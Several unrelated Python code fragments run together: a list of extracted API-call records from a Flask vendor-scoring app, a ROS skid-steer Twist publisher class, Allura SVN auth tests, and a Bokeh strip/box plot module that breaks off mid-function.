(['current_quarteryear.quarter'], {}), '(current_quarteryear.quarter)\n', (9117, 9146), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((9174, 9237), 'models.current_quarteryear.query.add_columns', 'current_quarteryear.query.add_columns', (['current_quarteryear.year'], {}), '(current_quarteryear.year)\n', (9211, 9237), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((32734, 32753), 'models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (32751, 32753), False, 'from models import db\n'), ((32818, 32852), 'flask.flash', 'flash', (['"""No updates where received"""'], {}), "('No updates where received')\n", (32823, 32852), False, 'from flask import flash\n'), ((8278, 8308), 'models.comments.query.join', 'comments.query.join', (['userstest'], {}), '(userstest)\n', (8297, 8308), False, 'from models import comments\n'), ((14244, 14310), 'helper.last_self_score', 'last_self_score', (['vendorid', 'item2[0]', 'current_quarter', 'current_year'], {}), '(vendorid, item2[0], current_quarter, current_year)\n', (14259, 14310), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((30310, 30376), 'helper.last_self_score', 'last_self_score', (['vendorid', 'item2[0]', 'current_quarter', 'current_year'], {}), '(vendorid, item2[0], current_quarter, current_year)\n', (30325, 30376), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((30445, 30509), 'helper.last_sm_score', 'last_sm_score', (['vendorid', 'item2[0]', 'current_quarter', 'current_year'], {}), '(vendorid, item2[0], current_quarter, current_year)\n', (30458, 30509), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((8969, 9017), 'models.vendors.query.filter_by', 'vendors.query.filter_by', ([], {'vendor_name': 'vendor_name'}), '(vendor_name=vendor_name)\n', (8992, 9017), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((12348, 12399), 'models.suitemodcat.query.filter_by', 'suitemodcat.query.filter_by', ([], {'suitemod_id': 'suitemodid'}), '(suitemod_id=suitemodid)\n', (12375, 12399), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((32404, 32613), 'models.rfielements_providers', 'rfielements_providers', ([], {'vendor_id': 'vendorid', 'smce_id': 'item1[1]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': 'current_round', 'self_score': 'new_ss', 'self_description': 'new_sd', 'attachment_id': 'None', 'user_id': '(1)'}), '(vendor_id=vendorid, smce_id=item1[1], quarter=\n current_quarter, year=current_year, round=current_round, self_score=\n new_ss, self_description=new_sd, attachment_id=None, user_id=1)\n', (32425, 32613), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((32629, 32656), 'models.db.session.add', 'db.session.add', (['element_row'], {}), '(element_row)\n', (32643, 32656), False, 'from models import db\n'), ((33113, 33138), 'flask.url_for', 'url_for', (['request.endpoint'], {}), '(request.endpoint)\n', (33120, 33138), False, 'from flask import url_for\n'), ((10959, 11001), 'sys.exit', 'sys.exit', (['"""Status is neither N, R, E or Z"""'], {}), "('Status is neither N, R, E or Z')\n", (10967, 11001), False, 'import sys\n'), ((11389, 11444), 'models.suitemodules.query.filter_by', 'suitemodules.query.filter_by', ([], {'suitemod_name': 'module_name'}), '(suitemod_name=module_name)\n', (11417, 11444), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((16145, 16193), 'models.rfielements_providers.smce_id.in_', 'rfielements_providers.smce_id.in_', (['smce_ids_list'], {}), '(smce_ids_list)\n', (16178, 16193), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((16576, 16623), 'models.rfielements_analysts.smce_id.in_', 'rfielements_analysts.smce_id.in_', (['smce_ids_list'], {}), '(smce_ids_list)\n', (16608, 16623), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((12799, 12851), 'models.suitemodcatelem.query.filter_by', 'suitemodcatelem.query.filter_by', ([], {'suitemodcat_id': 'item'}), '(suitemodcat_id=item)\n', (12830, 12851), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((13530, 13569), 'sqlalchemy.desc', 'desc', (['rfielements_providers.update_date'], {}), '(rfielements_providers.update_date)\n', (13534, 13569), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((16078, 16135), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (16115, 16135), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((16510, 16566), 'models.rfielements_analysts.query.filter_by', 'rfielements_analysts.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (16546, 16566), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((22735, 22786), 'models.suitemodcat.query.filter_by', 'suitemodcat.query.filter_by', ([], {'suitemodcatid': 'item1[0]'}), '(suitemodcatid=item1[0])\n', (22762, 22786), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((22856, 22915), 'models.category_names.query.filter_by', 'category_names.query.filter_by', ([], {'category_nameid': 'cat_name_id'}), '(category_nameid=cat_name_id)\n', (22886, 22915), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((10659, 10689), 'sqlalchemy.desc', 'desc', (['suitemodules.update_date'], {}), '(suitemodules.update_date)\n', (10663, 10689), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((13882, 13934), 'models.category_names.query.filter_by', 'category_names.query.filter_by', ([], {'category_nameid': 'item'}), '(category_nameid=item)\n', (13912, 13934), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((23063, 23117), 'models.element_names.query.filter_by', 'element_names.query.filter_by', ([], {'element_nameid': 'item2[1]'}), '(element_nameid=item2[1])\n', (23092, 23117), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((23209, 23260), 'models.elementvariants.query.filter_by', 'elementvariants.query.filter_by', ([], {'variantid': 'item2[2]'}), '(variantid=item2[2])\n', (23240, 23260), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((23350, 23401), 'models.elementvariants.query.filter_by', 'elementvariants.query.filter_by', ([], {'variantid': 'item2[2]'}), '(variantid=item2[2])\n', (23381, 23401), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((10268, 10315), 'models.vendors_rfi.query.filter_by', 'vendors_rfi.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (10295, 10315), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((10599, 10647), 'models.suitemodules.query.filter_by', 'suitemodules.query.filter_by', ([], {'suitemodid': 'item[1]'}), '(suitemodid=item[1])\n', (10627, 10647), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((13471, 13519), 'models.rfielements_providers.smce_id.in_', 'rfielements_providers.smce_id.in_', (['smce_ids_list'], {}), '(smce_ids_list)\n', (13504, 13519), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((13404, 13461), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (13441, 13461), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((27306, 27345), 'sqlalchemy.desc', 'desc', (['rfielements_providers.update_date'], {}), '(rfielements_providers.update_date)\n', (27310, 27345), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((27725, 27763), 'sqlalchemy.desc', 'desc', (['rfielements_analysts.update_date'], {}), '(rfielements_analysts.update_date)\n', (27729, 27763), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((28756, 28795), 'sqlalchemy.desc', 'desc', (['rfielements_providers.update_date'], {}), '(rfielements_providers.update_date)\n', (28760, 28795), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((29175, 29213), 'sqlalchemy.desc', 'desc', (['rfielements_analysts.update_date'], {}), '(rfielements_analysts.update_date)\n', (29179, 29213), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((27158, 27290), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(1)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=1)\n', (27195, 27290), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((27578, 27709), 'models.rfielements_analysts.query.filter_by', 'rfielements_analysts.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(1)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=1)\n', (27614, 27709), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((28608, 28740), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(2)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=2)\n', (28645, 28740), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((29028, 29159), 'models.rfielements_analysts.query.filter_by', 'rfielements_analysts.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(2)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=2)\n', (29064, 29159), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((11506, 11553), 'models.vendors_rfi.query.filter_by', 'vendors_rfi.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (11533, 11553), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((11721, 11768), 'models.vendors_rfi.query.filter_by', 'vendors_rfi.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (11748, 11768), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n')]
|
from command import Command
from utils import *
import rospy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy, JointState
class SkidSteer(Command):
""" Control a model with a SkidSteer plugin """
def __init__(self, name, skid_steer_topic, speed=5, rot_multiplier=1, clamp_below=0.1):
""" Args:
speed: max speed
rot_multiplier: rotation multiplier
"""
super(SkidSteer, self).__init__(name)
self.pub = rospy.Publisher(skid_steer_topic, Twist, queue_size=10)
self.speed = speed
self.rot_multiplier = rot_multiplier
self.clamp_below = clamp_below
def evaluate_speed_rot(self, x, y):
rot = x*self.rot_multiplier
speed = y*self.speed
return (speed, rot)
def makemsg(self, speed, rot):
twist = Twist()
twist.linear.x = speed
twist.angular.z = rot
return twist
def oncallback(self, cmd_data):
x, y = cmd_data['x'], cmd_data['y']
x, y = clamp_center(x, self.clamp_below), clamp_center(y, self.clamp_below)
speed, rot = self.evaluate_speed_rot(x, y)
msg = self.makemsg(speed, rot)
self.pub.publish(msg)
|
[
"rospy.Publisher",
"geometry_msgs.msg.Twist"
] |
[((514, 569), 'rospy.Publisher', 'rospy.Publisher', (['skid_steer_topic', 'Twist'], {'queue_size': '(10)'}), '(skid_steer_topic, Twist, queue_size=10)\n', (529, 569), False, 'import rospy\n'), ((869, 876), 'geometry_msgs.msg.Twist', 'Twist', ([], {}), '()\n', (874, 876), False, 'from geometry_msgs.msg import Twist\n')]
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from datadiff.tools import assert_equal
from allura.tests import TestController
from forgesvn.tests import with_svn
class TestSVNAuth(TestController):
@with_svn
def test_refresh_repo(self):
r = self.app.get('/auth/refresh_repo')
assert_equal(r.body, 'No repo specified')
r = self.app.get('/auth/refresh_repo/p/gbalksdfh')
assert_equal(r.body, 'No project at /p/gbalksdfh')
r = self.app.get('/auth/refresh_repo/p/test')
assert_equal(r.body, '/p/test does not include a repo mount point')
r = self.app.get('/auth/refresh_repo/p/test/blah/')
assert_equal(r.body, 'Cannot find repo at /p/test/blah')
r = self.app.get('/auth/refresh_repo/p/test/src/')
assert_equal(r.body,
'<Repository /tmp/svn/p/test/src> refresh queued.\n')
class TestSVNUserPermissions(TestController):
allow = dict(allow_read=True, allow_write=True, allow_create=True)
read = dict(allow_read=True, allow_write=False, allow_create=False)
disallow = dict(allow_read=False, allow_write=False, allow_create=False)
@with_svn
def test_list_repos(self):
r = self.app.get('/auth/repo_permissions',
params=dict(username='test-admin'), status=200)
assert_equal(json.loads(r.body), {"allow_write": [
'/svn/test/src',
]})
|
[
"json.loads",
"datadiff.tools.assert_equal"
] |
[((1164, 1205), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""No repo specified"""'], {}), "(r.body, 'No repo specified')\n", (1176, 1205), False, 'from datadiff.tools import assert_equal\n'), ((1274, 1324), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""No project at /p/gbalksdfh"""'], {}), "(r.body, 'No project at /p/gbalksdfh')\n", (1286, 1324), False, 'from datadiff.tools import assert_equal\n'), ((1388, 1455), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""/p/test does not include a repo mount point"""'], {}), "(r.body, '/p/test does not include a repo mount point')\n", (1400, 1455), False, 'from datadiff.tools import assert_equal\n'), ((1525, 1581), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""Cannot find repo at /p/test/blah"""'], {}), "(r.body, 'Cannot find repo at /p/test/blah')\n", (1537, 1581), False, 'from datadiff.tools import assert_equal\n'), ((1650, 1724), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""<Repository /tmp/svn/p/test/src> refresh queued.\n"""'], {}), "(r.body, '<Repository /tmp/svn/p/test/src> refresh queued.\\n')\n", (1662, 1724), False, 'from datadiff.tools import assert_equal\n'), ((2205, 2223), 'json.loads', 'json.loads', (['r.body'], {}), '(r.body)\n', (2215, 2223), False, 'import json\n')]
|
import copy
import warnings
import numpy as np
import pandas as pd
import colorcet
import bokeh.models
import bokeh.plotting
from . import utils
def strip(
data=None,
q=None,
cats=None,
q_axis="x",
palette=None,
order=None,
p=None,
show_legend=False,
color_column=None,
parcoord_column=None,
tooltips=None,
marker="circle",
jitter=False,
marker_kwargs=None,
jitter_kwargs=None,
parcoord_kwargs=None,
horizontal=None,
val=None,
**kwargs,
):
"""
Make a strip plot.
Parameters
----------
data : Pandas DataFrame, 1D Numpy array, or xarray
DataFrame containing tidy data for plotting. If a Numpy array,
a single category is assumed and a strip plot generated from
data.
q : hashable
Name of column to use as quantitative variable if `data` is a
Pandas DataFrame. Otherwise, `q` is used as the quantitative
axis label.
cats : hashable or list of hashables
Name of column(s) to use as categorical variable(s).
q_axis : str, either 'x' or 'y', default 'x'
Axis along which the quantitative value varies.
palette : list of strings of hex colors, or single hex string
If a list, color palette to use. If a single string representing
a hex color, all glyphs are colored with that color. Default is
colorcet.b_glasbey_category10 from the colorcet package.
order : list or None
If not None, must be a list of unique group names when the input
data frame is grouped by `cats`. The order of the list specifies
the ordering of the categorical variables on the categorical
axis and legend. If None, the categories appear in the order in
which they appeared in the inputted data frame.
p : bokeh.plotting.Figure instance, or None (default)
If None, create a new figure. Otherwise, populate the existing
figure `p`.
show_legend : bool, default False
If True, display legend.
color_column : hashable, default None
Column of `data` to use in determining color of glyphs. If None,
then `cats` is used.
parcoord_column : hashable, default None
Column of `data` to use to construct a parallel coordinate plot.
Data points with like entries in the parcoord_column are
connected with lines.
tooltips : list of 2-tuples
Specification for tooltips as per Bokeh specifications. For
example, if we want `col1` and `col2` tooltips, we can use
`tooltips=[('label 1': '@col1'), ('label 2': '@col2')]`.
marker : str, default 'circle'
Name of marker to be used in the plot (ignored if `formal` is
False). Must be one of['asterisk', 'circle', 'circle_cross',
'circle_x', 'cross', 'dash', 'diamond', 'diamond_cross', 'hex',
'inverted_triangle', 'square', 'square_cross', 'square_x',
'triangle', 'x']
jitter : bool, default False
If True, apply a jitter transform to the glyphs.
marker_kwargs : dict
Keyword arguments to pass when adding markers to the plot.
["x", "y", "source", "cat", "legend"] are note allowed because
they are determined by other inputs.
jitter_kwargs : dict
Keyword arguments to be passed to `bokeh.transform.jitter()`. If
not specified, default is
`{'distribution': 'normal', 'width': 0.1}`. If the user
specifies `{'distribution': 'uniform'}`, the `'width'` entry is
adjusted to 0.4.
horizontal : bool or None, default None
Deprecated. Use `q_axis`.
val : hashable
Deprecated, use `q`.
kwargs
Any kwargs to be passed to `bokeh.plotting.figure()` when
instantiating the figure.
Returns
-------
output : bokeh.plotting.Figure instance
Plot populated with a strip plot.
"""
# Protect against mutability of dicts
jitter_kwargs = copy.copy(jitter_kwargs)
marker_kwargs = copy.copy(marker_kwargs)
q = utils._parse_deprecations(q, q_axis, val, horizontal, "x")
if palette is None:
palette = colorcet.b_glasbey_category10
data, q, cats, show_legend = utils._data_cats(data, q, cats, show_legend, None)
cats, cols = utils._check_cat_input(
data, cats, q, color_column, parcoord_column, tooltips, palette, order, kwargs
)
grouped = data.groupby(cats, sort=False)
if p is None:
p, factors, color_factors = _cat_figure(
data, grouped, q, order, color_column, q_axis, kwargs
)
else:
if type(p.x_range) == bokeh.models.ranges.FactorRange and q_axis == "x":
raise RuntimeError("`q_axis` is 'x', but `p` has a categorical x-axis.")
elif type(p.y_range) == bokeh.models.ranges.FactorRange and q_axis == "y":
raise RuntimeError("`q_axis` is 'y', but `p` has a categorical y-axis.")
_, factors, color_factors = _get_cat_range(
data, grouped, order, color_column, q_axis
)
if tooltips is not None:
p.add_tools(bokeh.models.HoverTool(tooltips=tooltips))
if jitter_kwargs is None:
jitter_kwargs = dict(width=0.1, mean=0, distribution="normal")
elif type(jitter_kwargs) != dict:
raise RuntimeError("`jitter_kwargs` must be a dict.")
elif "width" not in jitter_kwargs:
if (
"distribution" not in jitter_kwargs
or jitter_kwargs["distribution"] == "uniform"
):
jitter_kwargs["width"] = 0.4
else:
jitter_kwargs["width"] = 0.1
if marker_kwargs is None:
marker_kwargs = {}
elif type(marker_kwargs) != dict:
raise RuntimeError("`marker_kwargs` must be a dict.")
if "color" not in marker_kwargs:
if color_column is None:
color_column = "cat"
marker_kwargs["color"] = bokeh.transform.factor_cmap(
color_column, palette=palette, factors=color_factors
)
if marker == "tick":
marker = "dash"
marker_fun = utils._get_marker(p, marker)
if marker == "dash":
if "angle" not in marker_kwargs and q_axis == "x":
marker_kwargs["angle"] = np.pi / 2
if "size" not in marker_kwargs:
if q_axis == "x":
marker_kwargs["size"] = p.plot_height * 0.25 / len(grouped)
else:
marker_kwargs["size"] = p.plot_width * 0.25 / len(grouped)
source = _cat_source(data, cats, cols, color_column)
if show_legend and "legend_field" not in marker_kwargs:
marker_kwargs["legend_field"] = "__label"
if q_axis == "x":
x = q
if jitter:
jitter_kwargs["range"] = p.y_range
y = bokeh.transform.jitter("cat", **jitter_kwargs)
else:
y = "cat"
p.ygrid.grid_line_color = None
else:
y = q
if jitter:
jitter_kwargs["range"] = p.x_range
x = bokeh.transform.jitter("cat", **jitter_kwargs)
else:
x = "cat"
p.xgrid.grid_line_color = None
if parcoord_column is not None:
source_pc = _parcoord_source(data, q, cats, q_axis, parcoord_column, factors)
if parcoord_kwargs is None:
line_color = "gray"
parcoord_kwargs = {}
elif type(parcoord_kwargs) != dict:
raise RuntimeError("`parcoord_kwargs` must be a dict.")
if "color" in parcoord_kwargs and "line_color" not in parcoord_kwargs:
line_color = parcoord_kwargs.pop("color")
else:
line_color = parcoord_kwargs.pop("line_color", "gray")
p.multi_line(
source=source_pc, xs="xs", ys="ys", line_color=line_color, **parcoord_kwargs
)
marker_fun(source=source, x=x, y=y, **marker_kwargs)
return p
def box(
data=None,
q=None,
cats=None,
q_axis="x",
palette=None,
order=None,
p=None,
whisker_caps=False,
display_points=True,
outlier_marker="circle",
min_data=5,
box_kwargs=None,
median_kwargs=None,
whisker_kwargs=None,
outlier_kwargs=None,
display_outliers=None,
horizontal=None,
val=None,
**kwargs,
):
"""
Make a box-and-whisker plot.
Parameters
----------
data : Pandas DataFrame, 1D Numpy array, or xarray
DataFrame containing tidy data for plotting. If a Numpy array,
a single category is assumed and a box plot with a single box is
generated from data.
q : hashable
Name of column to use as quantitative variable if `data` is a
Pandas DataFrame. Otherwise, `q` is used as the quantitative
axis label.
cats : hashable or list of hashables
Name of column(s) to use as categorical variable(s).
q_axis : str, either 'x' or 'y', default 'x'
Axis along which the quantitative value varies.
palette : list of strings of hex colors, or single hex string
If a list, color palette to use. If a single string representing
a hex color, all glyphs are colored with that color. Default is
colorcet.b_glasbey_category10 from the colorcet package.
order : list or None
If not None, must be a list of unique group names when the input
data frame is grouped by `cats`. The order of the list specifies
the ordering of the categorical variables on the categorical
axis and legend. If None, the categories appear in the order in
which they appeared in the inputted data frame.
p : bokeh.plotting.Figure instance, or None (default)
If None, create a new figure. Otherwise, populate the existing
figure `p`.
whisker_caps : bool, default False
If True, put caps on whiskers. If False, omit caps.
display_points : bool, default True
If True, display outliers and any other points that arise from
categories with fewer than `min_data` data points; otherwise
suppress them. This should only be False when using the boxes
as annotation on another plot.
outlier_marker : str, default 'circle'
Name of marker to be used in the plot (ignored if `formal` is
False). Must be one of['asterisk', 'circle', 'circle_cross',
'circle_x', 'cross', 'dash', 'diamond', 'diamond_cross', 'hex',
'inverted_triangle', 'square', 'square_cross', 'square_x',
'triangle', 'x']
min_data : int, default 5
Minimum number of data points in a given category in order to
make a box and whisker. Otherwise, individual data points are
plotted as in a strip plot.
box_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the boxes for the box plot.
median_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the median line for the box plot.
whisker_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.segment()`
when constructing the whiskers for the box plot.
outlier_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.circle()`
when constructing the outliers for the box plot.
horizontal : bool or None, default None
Deprecated. Use `q_axis`.
val : hashable
Deprecated, use `q`.
kwargs
Kwargs that are passed to bokeh.plotting.figure() in contructing
the figure.
Returns
-------
output : bokeh.plotting.Figure instance
Plot populated with box-and-whisker plot.
Notes
-----
Uses the Tukey convention for box plots. The top and bottom of
the box are respectively the 75th and 25th percentiles of the
data. The line in the middle of the box is the median. The top
whisker extends to the maximum of the set of data points that are
less than 1.5 times the IQR beyond the top of the box, with an
analogous definition for the lower whisker. Data points not
between the ends of the whiskers are considered outliers and are
plotted as individual points.
"""
# Protect against mutability of dicts
box_kwargs = copy.copy(box_kwargs)
median_kwargs = copy.copy(median_kwargs)
whisker_kwargs = copy.copy(whisker_kwargs)
outlier_kwargs = copy.copy(outlier_kwargs)
q = utils._parse_deprecations(q, q_axis, val, horizontal, "x")
if display_outliers is not None:
warnings.warn(
f"`display_outliers` is deprecated. Use `display_points`. Using `display_points={display_outliers}.",
DeprecationWarning,
)
display_points = display_outliers
if palette is None:
palette = colorcet.b_glasbey_category10
data, q, cats, _ = utils._data_cats(data, q, cats, False, None)
cats, cols = utils._check_cat_input(
data, cats, q, None, None, None, palette, order, box_kwargs
)
if outlier_kwargs is None:
outlier_kwargs = dict()
elif type(outlier_kwargs) != dict:
raise RuntimeError("`outlier_kwargs` must be a dict.")
if box_kwargs is None:
box_kwargs = {"line_color": None}
box_width = 0.4
elif type(box_kwargs) != dict:
raise RuntimeError("`box_kwargs` must be a dict.")
else:
box_width = box_kwargs.pop("width", 0.4)
if "line_color" not in box_kwargs:
box_kwargs["line_color"] = None
if whisker_kwargs is None:
if "fill_color" in box_kwargs:
whisker_kwargs = {"line_color": box_kwargs["fill_color"]}
else:
whisker_kwargs = {"line_color": "black"}
elif type(whisker_kwargs) != dict:
raise RuntimeError("`whisker_kwargs` must be a dict.")
if median_kwargs is None:
median_kwargs = {"line_color": "white"}
elif type(median_kwargs) != dict:
raise RuntimeError("`median_kwargs` must be a dict.")
elif "line_color" not in median_kwargs:
median_kwargs["line_color"] = white
if q_axis == "x":
if "height" in box_kwargs:
warnings.warn("'height' entry in `box_kwargs` ignored; using `box_width`.")
del box_kwargs["height"]
else:
if "width" in box_kwargs:
warnings.warn("'width' entry in `box_kwargs` ignored; using `box_width`.")
del box_kwargs["width"]
grouped = data.groupby(cats, sort=False)
if p is None:
p, factors, color_factors = _cat_figure(
data, grouped, q, order, None, q_axis, kwargs
)
else:
_, factors, color_factors = _get_cat_range(data, grouped, order, None, q_axis)
marker_fun = utils._get_marker(p, outlier_marker)
source_box, source_outliers = _box_source(data, cats, q, cols, min_data)
if "color" in outlier_kwargs:
if "line_color" in outlier_kwargs or "fill_color" in outlier_kwargs:
raise RuntimeError(
"If `color` is in `outlier_kwargs`, `line_color` and `fill_color` cannot be."
)
else:
if "fill_color" in box_kwargs:
if "fill_color" not in outlier_kwargs:
outlier_kwargs["fill_color"] = box_kwargs["fill_color"]
if "line_color" not in outlier_kwargs:
outlier_kwargs["line_color"] = box_kwargs["fill_color"]
else:
if "fill_color" not in outlier_kwargs:
outlier_kwargs["fill_color"] = bokeh.transform.factor_cmap(
"cat", palette=palette, factors=factors
)
if "line_color" not in outlier_kwargs:
outlier_kwargs["line_color"] = bokeh.transform.factor_cmap(
"cat", palette=palette, factors=factors
)
if "fill_color" not in box_kwargs:
box_kwargs["fill_color"] = bokeh.transform.factor_cmap(
"cat", palette=palette, factors=factors
)
if q_axis == "x":
p.segment(
source=source_box,
y0="cat",
y1="cat",
x0="top",
x1="top_whisker",
**whisker_kwargs,
)
p.segment(
source=source_box,
y0="cat",
y1="cat",
x0="bottom",
x1="bottom_whisker",
**whisker_kwargs,
)
if whisker_caps:
p.hbar(
source=source_box,
y="cat",
left="top_whisker",
right="top_whisker",
height=box_width / 4,
**whisker_kwargs,
)
p.hbar(
source=source_box,
y="cat",
left="bottom_whisker",
right="bottom_whisker",
height=box_width / 4,
**whisker_kwargs,
)
p.hbar(
source=source_box,
y="cat",
left="bottom",
right="top",
height=box_width,
**box_kwargs,
)
p.hbar(
source=source_box,
y="cat",
left="middle",
right="middle",
height=box_width,
**median_kwargs,
)
if display_points:
marker_fun(source=source_outliers, y="cat", x=q, **outlier_kwargs)
p.ygrid.grid_line_color = None
else:
p.segment(
source=source_box,
x0="cat",
x1="cat",
y0="top",
y1="top_whisker",
**whisker_kwargs,
)
p.segment(
source=source_box,
x0="cat",
x1="cat",
y0="bottom",
